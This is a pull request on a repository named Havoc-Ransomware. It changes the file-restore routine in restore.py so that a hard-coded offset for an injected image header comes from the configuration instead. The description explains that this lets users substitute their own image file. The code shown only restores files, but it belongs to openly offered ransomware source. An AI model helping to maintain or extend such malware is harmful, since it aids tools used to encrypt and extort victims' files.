### PR TITLE
Improve readability

### DIFF
--- a/restore.py
+++ b/restore.py
@@ -2,7 +2,7 @@ import struct,glob,os
 import conf
 import crypt
 
-injected_s = 3556020
+
 
 def restore_all():    
     for filename in glob.iglob(conf.test_folder + '**', recursive=True):
@@ -16,7 +16,7 @@ def restore_all():
 
 def eject(filename):
     with open(filename,'rb') as file:
-        file.seek(injected_s)
+        file.seek(conf.injected_s)
         s_len = struct.unpack('i',file.read(4))[0]
         orig_name = file.read(s_len)
         orig_file = file.read()


### PR DESCRIPTION
- [x] **injected_s** variable modification

Instead of reading a fixed number as the length of bytes in the [__conf.py__](https://github.com/ramirak/Havoc-Ransomware/blob/master/conf.py) file, we can instantly calculate the number of bytes in the [__fsoc.gif__](https://github.com/ramirak/Havoc-Ransomware/blob/master/fsoc.gif) file and then use it for **seek** method.
This has two advantages. First, it helps to understand how the script works, and second, the user can simply enter his own file path instead of the 'fsoc.gif' string, without the need for additional manual calculations.

- This change also requires approval of the Pull-requests **conf.py** file